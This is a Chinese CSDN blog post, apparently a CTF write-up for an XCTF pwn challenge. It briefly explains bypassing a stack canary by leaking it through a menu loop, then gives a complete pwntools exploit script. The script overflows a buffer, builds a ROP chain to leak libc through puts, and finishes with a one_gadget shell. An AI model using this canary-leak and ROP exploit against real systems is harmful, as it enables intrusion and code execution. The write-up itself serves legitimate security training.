[XCTF-pwn] 15_厦门邀请赛-pwn

最新推荐文章于 2022-09-09 15:28:21 发布
最新推荐文章于 2022-09-09 15:28:21 发布
阅读量319 收藏
点赞数
分类专栏: CTF pwn 文章标签: 安全 pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52640415/article/details/123272537
版权

同样是写溢出到return的题,这题设置了canary,canary这个机制是把一个0+7位随机数放在rbp的前面,如果发现被改动就调用check_stack_fail然后退出。

这个题有循环,只有退出时才会检查,所以在前边可以输入适当长度带出canary在退出前再恢复

from pwn import *

'''  
patchelf --set-interpreter /home/shi/buuctf/buuoj_2.23_amd64/ld_2.23-0ubuntu10_amd64.so pwn
patchelf --add-needed /home/shi/buuctf/buuoj_2.23_amd64/libc6_2.23-0ubuntu10_amd64.so pwn
'''

local = 0
if local == 1:
    p = process('./pwn')
    libc_elf = ELF('/home/shi/buuctf/buuoj_2.23_amd64/libc6_2.23-0ubuntu10_amd64.so')
    one = [0x45216, 0x4526a, 0xf02a4, 0xf1147 ]
    libc_start_main_ret = 0x20830
else:
    p = remote('111.200.241.244', 60088)
    libc_elf = ELF('./libc-2.23.so')
    one = [0x45216, 0x4526a, 0xf02a4, 0xf1147 ]
    libc_start_main_ret = 0x20830


elf = ELF('./pwn')
context.arch = 'amd64'
context.log_level = 'debug'

pop_rdi = 0x0000000000400a93 # pop rdi ; ret
pop_rsi = 0x0000000000400a91 # pop rsi ; pop r15 ; ret
payload = b'A'*(0x88+1) 
p.sendlineafter(b">> ", b'1')
p.send(payload)  #将canary第1字符置A再show得到canary

p.sendlineafter(b">> ", b'2')
p.recvuntil(b'A'*(0x88+1))  
canary = b'\x00' + p.recv(7)
print('canary:', hex(u64(canary)))

#再将rop写到返回地址,泄露libc
payload = b'A'*(0x88) + canary + b'\x00'*8 + flat(pop_rdi, elf.got['puts'], elf.plt['puts'], 0x400908)
p.sendlineafter(b">> ", b'1')
p.send(payload)

p.sendlineafter(b">> ", b'3')

libc_base = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00')) - libc_elf.sym['puts']
libc_elf.address = libc_base
print('libc:', hex(libc_base))

#最后写one_gadget
#payload = b'A'*(0x88) + canary + b'\x00'*8 + flat(pop_rdi+1, pop_rdi, next(libc_elf.search(b'/bin/sh\x00')),libc_elf.sym['system'])
payload = b'A'*(0x88) + canary + b'\x00'*8 + p64(libc_base + one[0])
p.sendlineafter(b">> ", b'1')
p.send(payload)
p.sendlineafter(b">> ", b'3')

p.sendline(b'cat flag')
p.interactive()

坑:这题在得到libc后写system(bin/sh)会报错,但写one_gadget能通过,没开理啊!

石氏是时试
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
厦门邀请赛 pwn2 XCTF
qq_41071646的博客
05-15 631
这个题 看起来是一个无懈可击的堆题 典型的 堆菜单题 然后看一下函数里面有没有什么利用的点 这里 感觉没有什么利用的点 然后我们往下看 这里的修改长度是我们自己输入 也就是我们自己定的 长度 那么我们就可以 实现堆块任意输入 然后继续往下看 这里可以有些麻烦 输出的内容长度被限定在了 一开始的堆块大小 这个 可能需要一些绕过 然后看一下 dele ...
PatchELF 给你的软件找一个动态库
dxs18459111694的博客
10-24 894
对于经常在服务器上跑程序或安装程序的朋友,不可避免的会遇到一些问题。其中最常见的问题就是,像下面这样glibc库找不到的问题,当然也可能会有其他库找不到的问题。那出现这种问题该怎么办呢?
Linux使用patchelf工具
juluwangriyue的博客
09-16 3万+
github地址:https://github.com/NixOS/patchelf 下载地址:https://github.com/NixOS/patchelf/releases 我直接下载的是PatchELF 0.12 patchelf-0.12.tar.gz 解压: $ tar -axf patchelf-0.12.tar.gz $ cd patchelf-0.12/ $ ls bootstrap.sh COPYING Makefile.am README.md
Linux 库文件劫持
travelnight的博客
09-09 2058
Linux库文件劫持
[BUUCTF-pwn] inndy_rsbo
weixin_52640415的博客
02-06 122
ida也不可全信。题目很简单就是有个溢出。32位no pie直接就write(write)但试了一下不行。用gdb跟一下发现,ida给的buf = ebp -0x60不对,应该是0x68 改为68就解决了 int __cdecl main(int argc, const char **argv, const char **envp) { char buf[80]; // [esp+10h] [ebp-60h] BYREF int v5; // [esp+60h] [ebp-10h] int
XCTF-HW-pipeline附件
最新发布
11-09
附件
XCTF-RE】新手练习区-open-source.c
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/zgwso7
XCTF-RE】新手练习区-csaw2013reversing2.exe
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/ova41g
XCTF-RE】新手练习区-maze
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/fr45py
XCTF-RE】新手练习区-logmein
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/ez5t60
Ubuntu16.04离线安装openssh以及依赖包
02-05
离线安装openssh主要需要安装openssh-server_7.2p2- 4ubuntu2.8_amd64.deb、openssh-sftp-server_7.2p2- 4ubuntu2.8_amd64.deb和openssh-client_7.2p2-4ubuntu2.8_amd64.deb 三个文件。离线环境下通过依次运行命令dpkg -i ******.deb执行安装步 骤如下(尽可能按照次序安装,部分安装可能存在冗余): 1.先安装基本的依赖环境libc6_2.23-0ubuntu10_amd64.deb、libdbus-1 -dev_1.10.6-1ubuntu3.4_amd64.deb、libgcrypt20_1.6.5- 2ubuntu0.6_amd64.deb、libgpg-error0_1.21-2ubuntu1_amd64.deb、 libsystemd0_229-4ubuntu21.21_amd64.deb、ssh-import-id_5.5- 0ubuntu1_all.deb、zlib1g_1.2.8.dfsg-2ubuntu4.3_amd64l.deb; 2.安装openssh-sftp-server_7.2p2-4ubuntu2.8_amd64.deb、openssh- server_7.2p2-4ubuntu2.8_amd64.deb、openssh-client_7.2p2- 4ubuntu2.8_amd64.deb。 3.如果存在依赖关系缺失,可以根据提示到other文件夹下找,基本相关 的依赖都有了
非root账户用patchelf对低版本glibc修正
LYZ的备忘录
12-29 861
最近看了Yuanming Hu同学主持开发的taichi库在Physical Simulation中的应用,印象深刻。自己在调用taichi库时因服务器glibc版本较低,出现了一点意外,将修正过程记录如下: (1)anaconda3装在服务器上之后,新建一个py36(64位 python3.6)的环境。 (2)在py36中通过如下命令即可顺利安装taichi库。 python -m pip install taichi (3)在测试examples时提示glibc版本较低,程序无法运行。 t
安装多版本python27并开启enable-shared
小小郭
07-04 3179
安装多个python27的版本,如果不开启enable-shared,指定不同路径即可。当开启enable-shared时,默认只有一个版本的python。 通过ldd查看关联的库,会发现都指向了同一个libpython2.7.so.1.0。# 通过gcc4编译安装的python27,指向的是/opt/python27/lib [root@cs-pl-test Python-2.7.2]# ldd
【linux】程序找不到动态库.so的解决办法|查看.so动态库信息|.so动态库加载顺序
bandaoyu的note
01-26 1万+
方法一:添加环境变量 子招数1. 添加当前用户当前终端的环境变量-临时 export LD_LIBRARY_PATH=/home/czd/... #.so file path 子招数2. 添加当前用户的环境变量 修改~/.bashrc文件,在其末尾,添加环境变量 vim ~/.bashrc export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:/home/czd/... #.so file path 使其生效, source ~/.bashrc 如不能生
64升级glibc_Linux 修改 ELF 解决 glibc 兼容性问题
weixin_32050773的博客
01-12 494
转自:Soul Of Free Loop链接:https://zohead.com/archives/mod-elf-glibc/Linux glibc 问题相信有不少 Linux 用户都碰到过运行第三方(非系统自带软件源)发布的程序时的 glibc 兼容性问题,这一般是由于当前 Linux 系统上的 GNU C 库(glibc)版本比较老导致的,例如我在 CentOS 6 64 位系统...
[ctfbub.pwn] 练习 16-
weixin_52640415的博客
09-07 535
ctfhub pwn练习
Linux的libc库
Erice_s的博客
05-18 8140
linux系统的libc库介绍
libc6-dev : 依赖: libc6 (= 2.23-0ubuntu3) 但是 2.23-0ubuntu10 正要被安装
热门推荐
王叔叔
11-19 4万+
无法安装libc6-dev 如果出现下面错误: 在装libc6-dev时下列的软件包有不能满足的依赖关系: libc6-dev : 依赖: libc6 (= 2.23-0ubuntu3) 但是 2.23-0ubuntu10 正要被安装 E: 无法安装的软件包 问题原因: 1.可能没有update,所以要安装的软件包与系统的当前版本不匹配。 用sudo apt-get update 试试,若不...
[BUUCTF-pwn] whitehat2018_pwn01
weixin_52640415的博客
12-30 380
又是一个代码巨长的程序,前十页没有有用的东西 程序开了PIE但是直接给了地址,== no PIE 在sub_1178发现fgets(s, 230, stdin); 这里s定义是rbp-d0 可以溢出到reb 也就是可以在这移栈 int sub_1178() { void *v0; // rax char s[112]; // [rsp+0h] [rbp-D0h] BYREF char nptr[16]; // [rsp+70h] [rbp-60h] BYREF char s1[32]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值